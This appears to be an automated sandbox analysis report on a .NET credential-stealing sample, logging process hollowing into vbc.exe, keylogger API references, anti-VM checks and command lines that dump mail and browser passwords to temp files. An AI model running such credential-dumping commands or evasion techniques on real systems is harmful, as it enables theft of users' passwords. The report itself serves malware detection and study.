              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.csBase64 encoded string: 'xZv2KTjDOGwMPewlL06/2/+cBh+3YNzZLNYqWwxyouAodILYLJV9xZ9CGhDaO0jH', 'G9O9EXxYbTKbu/JIqZ4FXWAEsGCT7RJ+/SHmPiE44HoRMOAUDNTRY4dL0xxXj+PX', 'yFzOCZnSHgqZgbtRiX7zTTL1Qt6D+8cCFAWN8MP9eKKls7OaJo1TF2n4j++JkQX9', 'O6ZQ7J5ocLxf6RhQQpNSk/JzuZPUi9E0JuztOnaE/Qd705fOtAkyZW1GYthg8J6YkNuszS5M9pYlCk2wrogMRg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@7/4@2/2
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040ED0B FindResourceA,SizeofResource,LoadResource,LockResource,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vkdr225E85.exe.logJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\holdermail.txtJump to behavior
              Source: Vkdr225E85.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Vkdr225E85.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\Vkdr225E85.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\Vkdr225E85.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Vkdr225E85.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Vkdr225E85.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exe, 00000007.00000002.282385616.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Vkdr225E85.exeMetadefender: Detection: 24%
              Source: Vkdr225E85.exeReversingLabs: Detection: 67%
              Source: unknownProcess created: C:\Users\user\Desktop\Vkdr225E85.exe 'C:\Users\user\Desktop\Vkdr225E85.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\Vkdr225E85.exe C:\Users\user\Desktop\Vkdr225E85.exe
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess created: C:\Users\user\Desktop\Vkdr225E85.exe C:\Users\user\Desktop\Vkdr225E85.exe
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
              Source: C:\Users\user\Desktop\Vkdr225E85.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
              Source: C:\Users\user\Desktop\Vkdr225E85.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: Vkdr225E85.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Vkdr225E85.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp
              Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exe
              Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exe

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F0680 pushfd ; retf
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F5038 pushfd ; retf
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4_2_073F4B7F pushad ; retf
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411879 push ecx; ret
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004118A0 push eax; ret
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004118A0 push eax; ret
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442871 push ecx; ret
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442A90 push eax; ret
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00442A90 push eax; ret
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00446E54 push eax; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.81105909328

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Changes the view of files in windows explorer (hidden files and folders)Show sources
              Source: C:\Users\user\Desktop\Vkdr225E85.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Vkdr225E85.exe PID: 6504, type: MEMORY
              Source: Yara matchFile source: 1.2.Vkdr225E85.exe.2fb1f74.1.raw.unpack, type: UNPACKEDPE
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Vkdr225E85.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Vkdr225E85.exeThread delayed: delay time: 180000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeWindow / User API: threadDelayed 471
              Source: C:\Users\user\Desktop\Vkdr225E85.exe TID: 6508Thread sleep time: -101757s >= -30000s
              Source: C:\Users\user\Desktop\Vkdr225E85.exe TID: 6532Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\Vkdr225E85.exe TID: 6840Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\Vkdr225E85.exe TID: 7028Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Desktop\Vkdr225E85.exe TID: 7036Thread sleep time: -140000s >= -30000s
              Source: C:\Users\user\Desktop\Vkdr225E85.exe TID: 7048Thread sleep time: -94200s >= -30000s
              Source: C:\Users\user\Desktop\Vkdr225E85.exe TID: 360Thread sleep time: -180000s >= -30000s
              Source: C:\Users\user\Desktop\Vkdr225E85.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004161B0 memset,GetSystemInfo,
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              .NET source code references suspicious native API functionsShow sources
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
              Source: 4.2.Vkdr225E85.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Users\user\Desktop\Vkdr225E85.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\user\Desktop\Vkdr225E85.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess created: C:\Users\user\Desktop\Vkdr225E85.exe C:\Users\user\Desktop\Vkdr225E85.exe
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
              Source: C:\Users\user\Desktop\Vkdr225E85.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
              Source: Vkdr225E85.exe, 00000004.00000002.505796707.00000000019C0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
              Source: Vkdr225E85.exe, 00000004.00000002.505796707.00000000019C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: Vkdr225E85.exe, 00000004.00000002.505796707.00000000019C0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: Vkdr225E85.exe, 00000004.00000002.505796707.00000000019C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Users\user\Desktop\Vkdr225E85.exe VolumeInformation
